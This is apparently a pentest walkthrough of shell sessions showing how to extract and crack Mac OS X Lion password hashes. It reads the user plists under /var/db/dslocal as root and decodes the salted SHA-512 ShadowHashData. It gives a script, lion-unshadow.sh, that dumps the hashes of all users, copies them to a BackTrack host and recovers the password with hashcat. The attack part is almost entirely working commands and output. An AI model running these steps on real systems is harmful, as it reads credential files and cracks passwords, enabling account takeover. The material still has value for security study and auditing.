bash-3.2# file /var/db/dslocal/nodes/Default/users/test.plist /var/db/dslocal/nodes/Default/users/test.plist: Apple binary property list bash-3.2# cp /var/db/dslocal/nodes/Default/users/test.plist . bash-3.2# plutil -convert xml1 test.plist

. . . <key>ShadowHashData</key> <array> <data> YnBsaXN0MDDRAQJdU0FMVEVELVNIQTUxMk8QRLsEid97Bz5xXxn4P9UtCO3i QkNVRFD3FZ3WXBACmKWCBSW1UyD0gYJJG3K0xLpQ17DigcHZjgZZGl6cYWf0 KnQvA1nHCAsZAAAAAAAAAQEAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAGA= </data> </array> . . .

bash-3.2# echo " YnBsaXN0MDDRAQJdU0FMVEVELVNIQTUxMk8QRLsEid97Bz5xXxn4P9UtCO3i QkNVRFD3FZ3WXBACmKWCBSW1UyD0gYJJG3K0xLpQ17DigcHZjgZZGl6cYWf0 KnQvA1nHCAsZAAAAAAAAAQEAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAGA=" | base64 -D > ShadowHashData bash-3.2# file ShadowHashData ShadowHashData: Apple binary property list

bash-3.2# plutil -convert xml1 ShadowHashData bash-3.2# more ShadowHashData <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>SALTED-SHA512</key> <data> uwSJ33sHPnFfGfg/1S0I7eJCQ1VEUPcVndZcEAKYpYIFJbVTIPSBgkkbcrTEulDXsOKB wdmOBlkaXpxhZ/QqdC8DWcc= </data> </dict> </plist>

bash-3.2# echo "uwSJ33sHPnFfGfg/1S0I7eJCQ1VEUPcVndZcEAKYpYIFJbVTIPSBgkkbcrTEulDXsOKB wdmOBlkaXpxhZ/QqdC8DWcc=" | base64 -D > hashfile bash-3.2# file hashfile hashfile: data bash-3.2# xxd hashfile 0000000: bb04 89df 7b07 3e71 5f19 f83f d52d 08ed ....{.>q_..?.-.. 0000010: e242 4355 4450 f715 9dd6 5c10 0298 a582 .BCUDP....\..... 0000020: 0525 b553 20f4 8182 491b 72b4 c4ba 50d7 .%.S ...I.r...P. 0000030: b0e2 81c1 d98e 0659 1a5e 9c61 67f4 2a74 .......Y.^.ag.*t 0000040: 2f03 59c7 /.Y.

bash-3.2# xxd -p -c 256 hashfile |wc -c 137

red

green

bash-3.2# xxd -p -c 256 hashfile | cut -c 1-8 | xxd -p -r > salt bash-3.2# echo -n "password" > password bash-3.2# cat salt password | shasum -b -a 512 7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7 *- bash-3.2# xxd -p -c 256 hashfile | cut -c 9- 7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7

#!/bin/sh if [ -f salts.bin ] then echo "Exiting: salts.bin already exists." exit fi if [ -f hashes.txt ] then echo "Exiting: hashes.txt already exists." exit fi ls /var/db/dslocal/nodes/Default/users/*.plist |grep -v '/_' | while read line do user=`plutil -convert xml1 "$line" -o - |grep --after-context=2 '<key>name</key>' |grep string | cut -f 2 -d '>' | cut -f 1 -d '<'` hash=`plutil -convert xml1 "$line" -o - |grep --after-context=6 ShadowHashData |grep --after-context=3 '<data>' |grep -v data | base64 -D | plutil -convert xml1 - -o - | grep --after-context=2 '<data>' |grep -v data | base64 -D | xxd -p -c 133` salt=`/bin/echo -n $hash | cut -c 1-8 | xxd -r -p` hash2=`/bin/echo -n $hash | cut -c 9- ` if [ `/bin/echo -n $hash | wc -c` -eq 136 ] then echo "Found hash for $user" echo $salt >> salts.bin echo $hash2 >> hashes.txt fi done

bash-3.2# sh lion-unshadow.sh Found hash for test bash-3.2# cat hashes.txt 7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7 bash-3.2# xxd salts.bin 0000000: bb 0489 df0a .....

bash-3.2# scp hashes.txt salts.bin root@backtrack: root@backtrack's password: hashes.txt 100% 258 0.3KB/s 00:00 salts.bin 100% 10 0.0KB/s 00:00 bash-3.2# ssh root@backtrack root@backtrack's password: Linux backtrack 2.6.38 #1 SMP Thu Mar 17 22:59:29 EDT 2011 x86_64 GNU/Linux root@backtrack:~# cd /pentest/passwords/hashcat root@backtrack:/pentest/passwords/hashcat# more password.list password root@backtrack:/pentest/passwords/hashcat# # Now we prepend our salts to the password list . . . root@backtrack:/pentest/passwords/hashcat# cat ~/salts.bin |while read salt; do cat password.list |while read password; do echo $salt$password >> salted.txt; done; done root@backtrack:/pentest/passwords/hashcat# ./hashcat-cli64.bin -m 1700 ~/hashes.txt salted.txt Initializing with 8 threads and 32mb segment-size... NOTE: press enter for status-screen Added hashes from file /root/hashes.txt: 2 (1 salts) 7b073e715f19f83fd52d08ede24243554450f7159dd65c100298a5820525b55320f48182491b72b4c4ba50d7b0e281c1d98e06591a5e9c6167f42a742f0359c7:???password Wordlist..: salted.txt Index.....: 1/1 (segment), 2 (words), 26 (bytes) Recovered.: 1/2 hashes, 0/1 salts Speed/sec.: - plains, - words Progress..: 2/2 (100.00%) Running...: --:--:--:-- Estimated.: --:--:--:-- Started: Mon Sep 5 19:46:37 2011 Stopped: Mon Sep 5 19:46:37 2011 root@backtrack:/pentest/passwords/hashcat#